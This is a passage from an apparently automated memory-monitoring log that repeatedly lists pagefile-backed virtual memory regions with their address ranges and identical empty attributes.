end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9646 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9647 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9648 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9649 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9650 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9651 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9652 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9653 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9654 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9655 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9656 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9657 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9658 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9659 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9660 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9661 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9662 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9663 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9664 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9665 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9666 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9667 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9668 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9669 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9670 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9671 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9672 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9673 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9674 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9675 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9676 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9677 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9678 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9679 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9680 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9681 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9682 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9683 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9684 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9685 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9686 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9687 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9688 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9689 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9690 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9691 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9692 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9693 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9694 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9695 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9696 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9697 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9698 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9699 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9700 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9701 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9702 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9703 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9704 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9705 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9706 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9707 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9708 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9709 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9710 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9711 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9712 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9713 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9714 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9715 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9716 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9717 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9718 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9719 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9720 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9721 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9722 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9723 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9724 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9725 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9726 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9727 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9728 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9729 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9730 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9731 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9732 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9733 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9734 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9735 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9736 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9737 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9738 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9739 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9740 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9741 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9742 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9743 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9744 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9745 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9746 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9747 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9748 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9749 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9750 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9751 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9752 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9753 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9754 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9755 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9756 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9757 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9758 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9759 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9760 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9761 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9762 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9763 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9764 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9765 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9766 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9767 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9768 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9769 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9770 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9771 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9772 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9773 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9774 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9775 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9776 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9777 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9778 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9779 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9780 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9781 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9782 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9783 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9784 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9785 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9786 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9787 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9788 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9789 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9790 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9791 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9792 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9793 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9794 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9795 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9796 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9797 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9798 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9799 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9800 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9801 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9802 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9803 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9804 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9805 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9806 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9807 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9808 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9809 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9810 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9811 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9812 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9813 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9814 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9815 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9816 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9817 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9818 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9819 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9820 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9821 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9822 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9823 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 